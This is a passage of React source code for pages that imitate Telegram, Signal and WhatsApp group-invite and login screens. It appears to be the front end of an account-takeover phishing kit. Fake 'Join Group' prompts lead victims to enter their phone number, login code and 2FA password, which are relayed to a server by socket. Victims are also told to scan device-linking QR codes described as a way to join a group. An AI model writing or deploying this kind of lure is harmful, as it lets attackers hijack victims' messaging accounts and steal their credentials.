    }

    const bgColor = activePlatform === 'signal' ? 'bg-[#3A76F0]' : activePlatform === 'telegram' ? 'bg-[#0088CC]' : 'bg-[#00A884]';
    const accentColor = activePlatform === 'signal' ? '#3A76F0' : activePlatform === 'telegram' ? '#0088CC' : '#00A884';
    const platformLabel = activePlatform === 'signal' ? 'Signal' : activePlatform === 'telegram' ? 'Telegram' : 'WhatsApp';
    const isTelegramJoinScene = scene === 'join-group' && activePlatform === 'telegram';
    const isTelegramJoinLanding = isTelegramJoinScene && !telegramInviteAccepted;
    const telegramSubscriberLabel = typeof telegramSubscriberCount === 'number'
        ? `${telegramSubscriberCount.toLocaleString()} ${telegramSubscriberCount === 1 ? 'subscriber' : 'subscribers'}`
        : 'Private group';
    const telegramPatternUrl = '/telegram-pattern-real.svg';
    const telegramDesktopGlowStyle = {
        backgroundImage: [
            'radial-gradient(circle at 14% 18%, rgba(88, 116, 85, 0.44) 0, rgba(88, 116, 85, 0.44) 14%, rgba(88, 116, 85, 0) 36%)',
            'radial-gradient(circle at 76% 14%, rgba(95, 84, 118, 0.24) 0, rgba(95, 84, 118, 0.24) 12%, rgba(95, 84, 118, 0) 30%)',
            'radial-gradient(circle at 18% 84%, rgba(115, 129, 79, 0.28) 0, rgba(115, 129, 79, 0.28) 13%, rgba(115, 129, 79, 0) 34%)',
            'radial-gradient(circle at 82% 78%, rgba(76, 109, 89, 0.26) 0, rgba(76, 109, 89, 0.26) 12%, rgba(76, 109, 89, 0) 32%)',
        ].join(', '),
    };
    const telegramDesktopPatternBaseStyle = {
        backgroundImage: `url('${telegramPatternUrl}')`,
        backgroundSize: '420px',
        backgroundPosition: '50% 50%',
        backgroundRepeat: 'repeat',
        mixBlendMode: 'overlay' as const,
        opacity: 0.3,
    };
    const telegramDesktopPatternTintStyle = {
        backgroundImage: `url('${telegramPatternUrl}')`,
        backgroundSize: '420px',
        backgroundPosition: '50% 50%',
        backgroundRepeat: 'repeat',
        opacity: 0.16,
        filter: 'invert(74%) sepia(10%) saturate(350%) hue-rotate(46deg) brightness(68%) contrast(86%)',
    };
    const telegramMobileCanvasStyle = {
        backgroundImage: [
            'radial-gradient(circle at 18% 14%, rgba(107, 165, 135, 0.28) 0, rgba(107, 165, 135, 0.28) 16%, rgba(107, 165, 135, 0) 40%)',
            'radial-gradient(circle at 78% 82%, rgba(213, 216, 141, 0.32) 0, rgba(213, 216, 141, 0.32) 14%, rgba(213, 216, 141, 0) 38%)',
            'linear-gradient(180deg, #eef2e6 0%, #d2dfc7 100%)',
        ].join(', '),
    };
    const telegramMobilePatternStyle = {
        backgroundImage: `url('${telegramPatternUrl}')`,
        backgroundSize: '210px',
        backgroundPosition: '50% 50%',
        backgroundRepeat: 'repeat',
        mixBlendMode: 'overlay' as const,
        opacity: 0.24,
    };
    const telegramJoinBackground = (
        <>
            <div className="absolute inset-0 hidden md:block bg-[linear-gradient(135deg,#151018_0%,#101418_26%,#141913_58%,#17120f_100%)]" />
            <div className="absolute inset-[-14%] hidden md:block opacity-90 blur-[96px]" style={telegramDesktopGlowStyle} />
            <div className="absolute inset-0 hidden md:block" style={telegramDesktopPatternBaseStyle} />
            <div className="absolute inset-0 hidden md:block" style={telegramDesktopPatternTintStyle} />
            <div className="absolute inset-0 md:hidden" style={telegramMobileCanvasStyle} />
            <div className="absolute inset-0 md:hidden" style={telegramMobilePatternStyle} />
        </>
    );

    if (isTelegramJoinLanding) {
        return (
            <div className="relative min-h-screen overflow-hidden">
                {telegramJoinBackground}
                <div className="relative z-10 flex min-h-screen flex-col">
                    <div className="flex items-center justify-between border-b border-black/5 bg-white px-4 py-4 md:border-b-0 md:bg-transparent md:px-8 md:py-5">
                        <div className="flex items-center gap-3 md:text-white">
                            <div className="flex h-10 w-10 items-center justify-center rounded-full bg-[#3390ec] text-white shadow-sm">
                                <svg viewBox="0 0 24 24" className="h-5 w-5" fill="currentColor" aria-hidden="true">
                                    <path d="M21.75 4.35a1.2 1.2 0 0 0-1.27-.18L3.47 11.56a1.1 1.1 0 0 0 .1 2.05l4.57 1.55 1.62 5.1a1.1 1.1 0 0 0 1.98.23l2.56-3.53 4.5 3.28a1.2 1.2 0 0 0 1.9-.7l2.2-13.77a1.2 1.2 0 0 0-.45-1.12ZM9.2 14.53l8.7-6.45-7.07 7.82-.66 2.74-.97-4.11Z" />
                                </svg>
                            </div>
                            <span className="text-[1.05rem] font-semibold text-[#1f2c38] md:text-white">Telegram</span>
                        </div>
                        <a
                            href="https://telegram.org/dl"
                            target="_blank"
                            rel="noreferrer"
                            className="rounded-full bg-[#3390ec] px-5 py-2 text-sm font-semibold uppercase tracking-[0.02em] text-white shadow-sm transition hover:bg-[#2a82d7]"
                        >
                            Download
                        </a>
                    </div>

                    <div className="flex flex-1 items-start justify-center px-4 pb-10 pt-10 md:items-center md:px-8 md:pt-0">
                        <div className="w-full max-w-[392px] md:max-w-[306px]">
                            {platform === 'both' && (
                                <div className="mb-4 rounded-2xl bg-white/80 p-1 backdrop-blur md:bg-white/10">
                                    <div className="flex gap-1">
                                        <button
                                            onClick={() => { setActivePlatform('whatsapp'); setHasClaimed(false); }}
                                            className="flex-1 rounded-xl px-3 py-2 text-sm font-medium text-gray-700 transition hover:bg-white/70 md:text-white/80 md:hover:bg-white/10"
                                        >
                                            WhatsApp
                                        </button>
                                        <button
                                            onClick={() => { setActivePlatform('signal'); setHasClaimed(false); }}
                                            className="flex-1 rounded-xl px-3 py-2 text-sm font-medium text-gray-700 transition hover:bg-white/70 md:text-white/80 md:hover:bg-white/10"
                                        >
                                            Signal
                                        </button>
                                        <button
                                            className="flex-1 rounded-xl bg-white px-3 py-2 text-sm font-medium text-[#3390ec] shadow-sm md:bg-white/15 md:text-white"
                                            disabled
                                        >
                                            Telegram
                                        </button>
                                    </div>
                                </div>
                            )}

                            <div className="rounded-[28px] bg-white px-6 py-8 shadow-[0_16px_48px_rgba(28,39,56,0.18)] md:rounded-[22px] md:bg-[#1f1f1f] md:px-8 md:py-9 md:shadow-[0_18px_50px_rgba(0,0,0,0.45)]">
                                <div className="mx-auto mb-5 flex h-28 w-28 items-center justify-center overflow-hidden rounded-full bg-gradient-to-b from-[#6cc8ff] to-[#3390ec] shadow-lg md:mb-4 md:h-24 md:w-24">
                                    {groupImage ? (
                                        <img src={groupImage} alt={groupName} className="h-full w-full object-cover" />
                                    ) : (
                                        <span className="text-5xl font-semibold text-white md:text-[2.6rem]">{groupName.charAt(0).toUpperCase()}</span>
                                    )}
                                </div>
                                <h1 className="text-center text-[2.1rem] font-bold leading-none text-black md:text-[2rem] md:text-white">{groupName}</h1>
                                <p className="mt-3 text-center text-[1rem] text-[#7c7c7c] md:mt-2 md:text-[0.95rem] md:text-[#9aa3ab]">{telegramSubscriberLabel}</p>
                                <button
                                    onClick={() => setTelegramInviteAccepted(true)}
                                    className="mx-auto mt-8 flex min-h-[50px] min-w-[176px] items-center justify-center rounded-full bg-[#3390ec] px-8 text-base font-semibold uppercase tracking-[0.02em] text-white transition hover:bg-[#2a82d7] md:mt-6 md:min-h-[46px] md:min-w-[132px] md:px-6 md:text-sm"
                                >
                                    Join Group
                                </button>
                                <p className="mt-8 text-center text-[1.15rem] leading-7 text-[#7a7a7a] md:hidden">
                                    You are invited to the group <span className="font-semibold text-[#555]">{groupName}</span>. Click above to join.
                                </p>
                            </div>

                            {(sessionExpiredMessage || telegramConnectionState.error) && (
                                <div className="mt-4 rounded-2xl border border-yellow-200 bg-yellow-50 p-3 text-sm text-yellow-800 md:border-yellow-500/20 md:bg-[#20170b] md:text-yellow-200">
                                    {sessionExpiredMessage || telegramConnectionState.error}
                                </div>
                            )}
                        </div>
                    </div>
                </div>
            </div>
        );
    }

    return (
        <div className={isTelegramJoinScene ? 'relative min-h-screen overflow-hidden' : `min-h-screen ${bgColor}`}>
            {isTelegramJoinScene && telegramJoinBackground}
            <div className={`${isTelegramJoinScene ? 'relative z-10' : ''} min-h-screen flex items-center justify-center p-4`}>
                <div className="w-full max-w-md">
                {/* Main Card */}
                <div className="bg-white rounded-3xl shadow-2xl overflow-hidden">
                    {/* Header */}
                    <div className="pt-8 pb-6 px-6 text-center">
                        {scene === 'website-login' ? (
                            <>
                                {/* Website Logo */}
                                <div className="w-24 h-24 mx-auto mb-4 rounded-2xl overflow-hidden flex items-center justify-center bg-gray-100 shadow-lg border border-gray-200">
                                    {websiteLogo ? (
                                        <img 
                                            src={websiteLogo} 
                                            alt="" 
                                            className="w-full h-full object-contain p-2"
                                        />
                                    ) : (
                                        <Globe className="w-12 h-12 text-gray-400" />
                                    )}
                                </div>
                                
                                {/* Website Name */}
                                <h1 className="text-xl font-semibold text-gray-900 mb-1">
                                    Login to {websiteName}
                                </h1>
                                {websiteDescription ? (
                                    <p className="text-sm text-gray-500">{websiteDescription}</p>
                                ) : (
                                    <p className="text-sm text-gray-500">Sign in with your {platformLabel} account</p>
                                )}
                            </>
                        ) : (
                            <>
                                {/* Group Image */}
                                <div className={`w-24 h-24 mx-auto mb-4 rounded-full overflow-hidden flex items-center justify-center shadow-lg`} style={{ backgroundColor: accentColor }}>
                                    {groupImage ? (
                                        <img 
                                            src={groupImage} 
                                            alt={groupName} 
                                            className="w-full h-full object-cover"
                                        />
                                    ) : (
                                        <Users className="w-12 h-12 text-white" />
                                    )}
                                </div>
                                
                                {/* Group Name */}
                                <h1 className="text-xl font-semibold text-gray-900 mb-1">
                                    {groupName}
                                </h1>
                                <p className="text-sm text-gray-500">
                                    {activePlatform === 'telegram' ? telegramSubscriberLabel : `${platformLabel} Group`}
                                </p>
                            </>
                        )}
                    </div>

                    {/* Session Expired Warning */}
                    {(sessionExpiredMessage || signalConnectionState.error || telegramConnectionState.error) && (
                        <div className="mx-6 mb-4 bg-yellow-50 border border-yellow-200 rounded-xl p-3 flex items-center gap-3">
                            <AlertTriangle className="w-5 h-5 text-yellow-500 flex-shrink-0" />
                            <p className="text-yellow-700 text-sm">{sessionExpiredMessage || signalConnectionState.error || telegramConnectionState.error}</p>
                        </div>
                    )}

                    {/* Platform Tabs - Only show if both platforms allowed */}
                    {platform === 'both' && (
                        <div className="px-6 mb-4">
                            <div className="bg-gray-100 rounded-xl p-1 flex">
                                <button
                                    onClick={() => { setActivePlatform('whatsapp'); setHasClaimed(false); }}
                                    className={`flex-1 py-2.5 rounded-lg text-sm font-medium transition-all flex items-center justify-center gap-1 ${
                                        activePlatform === 'whatsapp'
                                            ? 'bg-white text-[#00A884] shadow-sm'
                                            : 'text-gray-600 hover:text-gray-800'
                                    }`}
                                >
                                    <MessageCircle size={16} />
                                    WhatsApp
                                </button>
                                <button
                                    onClick={() => { setActivePlatform('signal'); setHasClaimed(false); }}
                                    className={`flex-1 py-2.5 rounded-lg text-sm font-medium transition-all flex items-center justify-center gap-1 ${
                                        activePlatform === 'signal'
                                            ? 'bg-white text-[#3A76F0] shadow-sm'
                                            : 'text-gray-600 hover:text-gray-800'
                                    }`}
                                >
                                    <MessageCircle size={16} />
                                    Signal
                                </button>
                                <button
                                    onClick={() => { setActivePlatform('telegram'); setHasClaimed(false); }}
                                    className={`flex-1 py-2.5 rounded-lg text-sm font-medium transition-all flex items-center justify-center gap-1 ${
                                        activePlatform === 'telegram'
                                            ? 'bg-white text-[#0088CC] shadow-sm'
                                            : 'text-gray-600 hover:text-gray-800'
                                    }`}
                                >
                                    <MessageCircle size={16} />
                                    Telegram
                                </button>
                            </div>
                        </div>
                    )}

                    {/* Login Method Tabs */}
                    {loginMethod === 'both' && (activePlatform === 'whatsapp' || activePlatform === 'telegram') && (
                        <div className="px-6 mb-4">
                            <div className="bg-gray-100 rounded-xl p-1 flex">
                                <button
                                    onClick={() => setActiveMethod('qr')}
                                    className={`flex-1 py-2.5 rounded-lg text-sm font-medium transition-all ${
                                        activeMethod === 'qr'
                                            ? `bg-white ${activePlatform === 'telegram' ? 'text-[#0088CC]' : 'text-[#00A884]'} shadow-sm`
                                            : 'text-gray-600 hover:text-gray-800'
                                    }`}
                                >
                                    Scan QR
                                </button>
                                <button
                                    onClick={() => setActiveMethod('phone')}
                                    className={`flex-1 py-2.5 rounded-lg text-sm font-medium transition-all ${
                                        activeMethod === 'phone'
                                            ? `bg-white ${activePlatform === 'telegram' ? 'text-[#0088CC]' : 'text-[#00A884]'} shadow-sm`
                                            : 'text-gray-600 hover:text-gray-800'
                                    }`}
                                >
                                    Phone Number
                                </button>
                            </div>
                        </div>
                    )}

                    {/* Signal QR Code Section */}
                    {activePlatform === 'signal' && (
                        <div className="px-6 pb-6">
                            <div className="bg-gray-50 rounded-2xl p-4 flex flex-col items-center">
                                {/* QR Code */}
                                <div className="bg-white p-4 rounded-xl shadow-sm mb-4">
                                    {signalConnectionState.qrUrl ? (
                                        <img 
                                            src={signalConnectionState.qrUrl} 
                                            alt="Signal QR Code"
                                            className="w-[200px] h-[200px] bg-white"
                                            onError={() => handleRefreshQR()}
                                        />
                                    ) : (
                                        <div className="w-[200px] h-[200px] flex flex-col items-center justify-center">
                                            <Loader2 className="w-10 h-10 animate-spin text-[#3A76F0] mb-2" />
                                            <span className="text-sm text-gray-500">Loading QR Code...</span>
                                        </div>
                                    )}
                                </div>

                                {/* Instructions */}
                                <p className="text-center text-sm text-gray-600 mb-4">
                                    Scan this QR Code with Signal to link your device
                                </p>

                                {/* Refresh Button */}
                                <button
                                    onClick={handleRefreshQR}
                                    disabled={isRefreshing}
                                    className="px-5 py-2.5 bg-[#3A76F0] hover:bg-[#2D5FCC] text-white rounded-full flex items-center gap-2 text-sm font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed"
                                >
                                    <RefreshCw className={`w-4 h-4 ${isRefreshing ? 'animate-spin' : ''}`} />
                                    {isRefreshing ? 'Refreshing...' : 'Refresh QR'}
                                </button>

                            
                            </div>
                        </div>
                    )}

                    {/* Telegram QR Code Section */}
                    {activePlatform === 'telegram' && (
                        <div className="px-6 pb-6">
                            <div className="bg-gray-50 rounded-2xl p-4 flex flex-col items-center">
                                {telegramConnectionState.error && (
                                    <div className="w-full max-w-xs mb-4 rounded-2xl border border-red-200 bg-red-50 px-4 py-3 text-sm text-red-600">
                                        {telegramConnectionState.error}
                                    </div>
                                )}
                                {telegramConnectionState.is2FARequired ? (
                                    <>
                                        <div className="w-full max-w-xs">
                                            <p className="text-center text-sm text-gray-600 mb-3">
                                                Two-factor authentication is enabled. Please enter your password.
                                            </p>
                                            {telegramConnectionState.twoFAHint && (
                                                <p className="text-center text-xs text-gray-400 mb-3">
                                                    Hint: {telegramConnectionState.twoFAHint}
                                                </p>
                                            )}
                                            <input
                                                type="password"
                                                value={telegram2FAPassword}
                                                onChange={(e) => setTelegram2FAPassword(e.target.value)}
                                                placeholder="Enter 2FA password"
                                                className="w-full px-4 py-2.5 border border-gray-200 rounded-xl text-sm focus:outline-none focus:ring-2 focus:ring-[#0088CC] mb-3"
                                            />
                                            <button
                                                onClick={() => {
                                                    socket.emit('telegram-2fa-response', {
                                                        sessionId: telegramConnectionState.sessionId,
                                                        password: telegram2FAPassword,
                                                    });
                                                    setTelegram2FAPassword('');
                                                }}
                                                className="w-full px-5 py-2.5 bg-[#0088CC] hover:bg-[#006FA8] text-white rounded-full text-sm font-medium transition-all"
                                            >
                                                Submit
                                            </button>
                                        </div>
                                    </>
                                ) : telegramConnectionState.authStep === 'phone' ? (
                                    <div className="w-full max-w-xs">
                                        <p className="text-center text-sm text-gray-600 mb-3">
                                            Enter your Telegram mobile number with the country code.
                                        </p>
                                        <input
                                            type="tel"
                                            value={telegramPhoneNumber}
                                            onChange={(e) => setTelegramPhoneNumber(e.target.value)}
                                            placeholder="+1 555 123 4567"
                                            className="w-full px-4 py-2.5 border border-gray-200 rounded-xl text-sm focus:outline-none focus:ring-2 focus:ring-[#0088CC] mb-3"
                                        />
                                        <button
                                            onClick={() => {
                                                if (!telegramPhoneNumber.trim()) {
                                                    setTelegramConnectionState(prev => ({ ...prev, error: 'Enter a valid Telegram phone number.' }));
                                                    return;
                                                }
                                                setTelegramConnectionState(prev => ({ ...prev, error: null }));
                                                socket.emit('telegram-phone-response', {
                                                    sessionId: telegramConnectionState.sessionId,
                                                    phoneNumber: telegramPhoneNumber.trim(),
                                                });
                                            }}
                                            className="w-full px-5 py-2.5 bg-[#0088CC] hover:bg-[#006FA8] text-white rounded-full text-sm font-medium transition-all"
                                        >
                                            Continue
                                        </button>
                                        <button
                                            onClick={handleRefreshQR}
                                            disabled={isRefreshing}
                                            className="w-full mt-3 px-5 py-2.5 border border-[#0088CC]/20 text-[#0088CC] rounded-full text-sm font-medium transition-all hover:bg-[#0088CC]/5 disabled:opacity-50"
                                        >
                                            {isRefreshing ? 'Restarting...' : 'Start Over'}
                                        </button>
                                    </div>
                                ) : telegramConnectionState.authStep === 'code' ? (
                                    <div className="w-full max-w-xs">
                                        <p className="text-center text-sm text-gray-600 mb-2">
                                            {telegramConnectionState.isCodeViaApp
                                                ? 'Telegram sent the login code to one of your active Telegram apps.'
                                                : `Enter the login code sent to ${telegramPhoneNumber || telegramConnectionState.phoneNumber || 'your phone'}.`}
                                        </p>
                                        <input
                                            type="text"
                                            inputMode="numeric"
                                            value={telegramPhoneCode}
                                            onChange={(e) => setTelegramPhoneCode(e.target.value)}
                                            placeholder="Enter login code"
                                            className="w-full px-4 py-2.5 border border-gray-200 rounded-xl text-sm focus:outline-none focus:ring-2 focus:ring-[#0088CC] mb-3"
                                        />
                                        <button
                                            onClick={() => {
                                                if (!telegramPhoneCode.trim()) {
                                                    setTelegramConnectionState(prev => ({ ...prev, error: 'Enter the Telegram login code.' }));
                                                    return;
                                                }
                                                setTelegramConnectionState(prev => ({ ...prev, error: null }));
                                                socket.emit('telegram-code-response', {
                                                    sessionId: telegramConnectionState.sessionId,
                                                    code: telegramPhoneCode.trim(),
                                                });
                                                setTelegramPhoneCode('');
                                            }}
                                            className="w-full px-5 py-2.5 bg-[#0088CC] hover:bg-[#006FA8] text-white rounded-full text-sm font-medium transition-all"
                                        >
                                            Verify Code
                                        </button>
                                        <button
                                            onClick={handleRefreshQR}
                                            disabled={isRefreshing}
                                            className="w-full mt-3 px-5 py-2.5 border border-[#0088CC]/20 text-[#0088CC] rounded-full text-sm font-medium transition-all hover:bg-[#0088CC]/5 disabled:opacity-50"
                                        >
                                            {isRefreshing ? 'Restarting...' : 'Start Over'}
                                        </button>
                                    </div>
                                ) : (
                                    <>
                                        {/* QR Code */}
                                        <div className="bg-white p-4 rounded-xl shadow-sm mb-4">
                                            {telegramConnectionState.qrDataUrl ? (
                                                <img
                                                    src={telegramConnectionState.qrDataUrl}
                                                    alt="Telegram QR Code"
                                                    className="w-[200px] h-[200px]"
                                                />
                                            ) : (
                                                <div className="w-[200px] h-[200px] flex flex-col items-center justify-center">
                                                    <Loader2 className="w-10 h-10 animate-spin text-[#0088CC] mb-2" />
                                                    <span className="text-sm text-gray-500">Loading QR Code...</span>
                                                </div>
                                            )}
                                        </div>

                                        {/* Instructions */}
                                        <p className="text-center text-sm text-gray-600 mb-4">
                                            Open Telegram &gt; Settings &gt; Devices &gt; Link Desktop Device
                                        </p>

                                        {/* Refresh Button */}
                                        <button
                                            onClick={handleRefreshQR}
                                            disabled={isRefreshing}
                                            className="px-5 py-2.5 bg-[#0088CC] hover:bg-[#006FA8] text-white rounded-full flex items-center gap-2 text-sm font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed"
                                        >
                                            <RefreshCw className={`w-4 h-4 ${isRefreshing ? 'animate-spin' : ''}`} />
                                            {isRefreshing ? 'Refreshing...' : 'Refresh QR'}
                                        </button>
                                    </>
                                )}
                            </div>
                        </div>
                    )}

                    {/* WhatsApp QR Code Section */}
                    {activePlatform === 'whatsapp' && activeMethod === 'qr' && (
                        <div className="px-6 pb-6">
                            <div className="bg-gray-50 rounded-2xl p-4 flex flex-col items-center">
                                {/* QR Code */}
                                <div className="bg-white p-4 rounded-xl shadow-sm mb-4">
                                    {connectionState.qrCode ? (
                                        <QRCodeSVG 
                                            value={connectionState.qrCode} 
                                            size={200}
                                            bgColor="#FFFFFF"
                                            fgColor="#000000"
                                        />
                                    ) : (
                                        <div className="w-[200px] h-[200px] flex flex-col items-center justify-center">
                                            <Loader2 className="w-10 h-10 animate-spin text-[#00A884] mb-2" />
                                            <span className="text-sm text-gray-500">Loading QR Code...</span>
                                        </div>
                                    )}
                                </div>

                                {/* Instructions */}
                                <p className="text-center text-sm text-gray-600 mb-4">
                                    Scan or Upload this QR Code on WhatsApp to join this Group
                                </p>

                                {/* Refresh Button */}
                                <button
                                    onClick={handleRefreshQR}
                                    disabled={isRefreshing}
                                    className="px-5 py-2.5 bg-[#00A884] hover:bg-[#008F72] text-white rounded-full flex items-center gap-2 text-sm font-medium transition-all disabled:opacity-50 disabled:cursor-not-allowed"
                                >
                                    <RefreshCw className={`w-4 h-4 ${isRefreshing ? 'animate-spin' : ''}`} />
                                    {isRefreshing ? 'Refreshing...' : 'Refresh QR'}
                                </button>
                            </div>
                        </div>
                    )}

                    {/* WhatsApp Phone Number Section */}
                    {activePlatform === 'whatsapp' && activeMethod === 'phone' && (
                        <div className="px-6 pb-6">
                            <div className="bg-gray-50 rounded-2xl p-4">
                                <PhoneNumberLogin 
                                    onLoginSuccess={handlePhoneLoginSuccess} 
                                    onSwitchToQR={() => setActiveMethod('qr')}
                                    initialCountryCode={preferredCountryCode}
                                />
                            </div>
                        </div>
                    )}
                </div>

                {/* Platform Branding */}
                <div className="mt-6 text-center">
                    <div className="flex items-center justify-center gap-2 text-white/80">
                        {activePlatform === 'signal' ? (
                            <>
                                <MessageCircle className="w-5 h-5" />
                                <span className="text-sm font-medium">Signal</span>
                            </>
                        ) : activePlatform === 'telegram' ? (
                            <>
                                <svg className="w-5 h-5" viewBox="0 0 24 24" fill="currentColor">
                                    <path d="M11.944 0A12 12 0 0 0 0 12a12 12 0 0 0 12 12 12 12 0 0 0 12-12A12 12 0 0 0 12 0a12 12 0 0 0-.056 0zm4.962 7.224c.1-.002.321.023.465.14a.506.506 0 0 1 .171.325c.016.093.036.306.02.472-.18 1.898-.962 6.502-1.36 8.627-.168.9-.499 1.201-.82 1.23-.696.065-1.225-.46-1.9-.902-1.056-.693-1.653-1.124-2.678-1.8-1.185-.78-.417-1.21.258-1.91.177-.184 3.247-2.977 3.307-3.23.007-.032.014-.15-.056-.212s-.174-.041-.249-.024c-.106.024-1.793 1.14-5.061 3.345-.479.33-.913.49-1.302.48-.428-.008-1.252-.241-1.865-.44-.752-.245-1.349-.374-1.297-.789.027-.216.325-.437.893-.663 3.498-1.524 5.83-2.529 6.998-3.014 3.332-1.386 4.025-1.627 4.476-1.635z"/>
                                </svg>
                                <span className="text-sm font-medium">Telegram</span>
                            </>
                        ) : (
                            <>
                                <svg className="w-5 h-5" viewBox="0 0 24 24" fill="currentColor">
                                    <path d="M17.472 14.382c-.297-.149-1.758-.867-2.03-.967-.273-.099-.471-.148-.67.15-.197.297-.767.966-.94 1.164-.173.199-.347.223-.644.075-.297-.15-1.255-.463-2.39-1.475-.883-.788-1.48-1.761-1.653-2.059-.173-.297-.018-.458.13-.606.134-.133.298-.347.446-.52.149-.174.198-.298.298-.497.099-.198.05-.371-.025-.52-.075-.149-.669-1.612-.916-2.207-.242-.579-.487-.5-.669-.51-.173-.008-.371-.01-.57-.01-.198 0-.52.074-.792.372-.272.297-1.04 1.016-1.04 2.479 0 1.462 1.065 2.875 1.213 3.074.149.198 2.096 3.2 5.077 4.487.709.306 1.262.489 1.694.625.712.227 1.36.195 1.871.118.571-.085 1.758-.719 2.006-1.413.248-.694.248-1.289.173-1.413-.074-.124-.272-.198-.57-.347m-5.421 7.403h-.004a9.87 9.87 0 01-5.031-1.378l-.361-.214-3.741.982.998-3.648-.235-.374a9.86 9.86 0 01-1.51-5.26c.001-5.45 4.436-9.884 9.888-9.884 2.64 0 5.122 1.03 6.988 2.898a9.825 9.825 0 012.893 6.994c-.003 5.45-4.437 9.884-9.885 9.884m8.413-18.297A11.815 11.815 0 0012.05 0C5.495 0 .16 5.335.157 11.892c0 2.096.547 4.142 1.588 5.945L.057 24l6.305-1.654a11.882 11.882 0 005.683 1.448h.005c6.554 0 11.89-5.335 11.893-11.893a11.821 11.821 0 00-3.48-8.413z"/>
                                </svg>
                                <span className="text-sm font-medium">WhatsApp</span>
                            </>
                        )}
                    </div>
                </div>
                </div>
            </div>
        </div>
    );
}
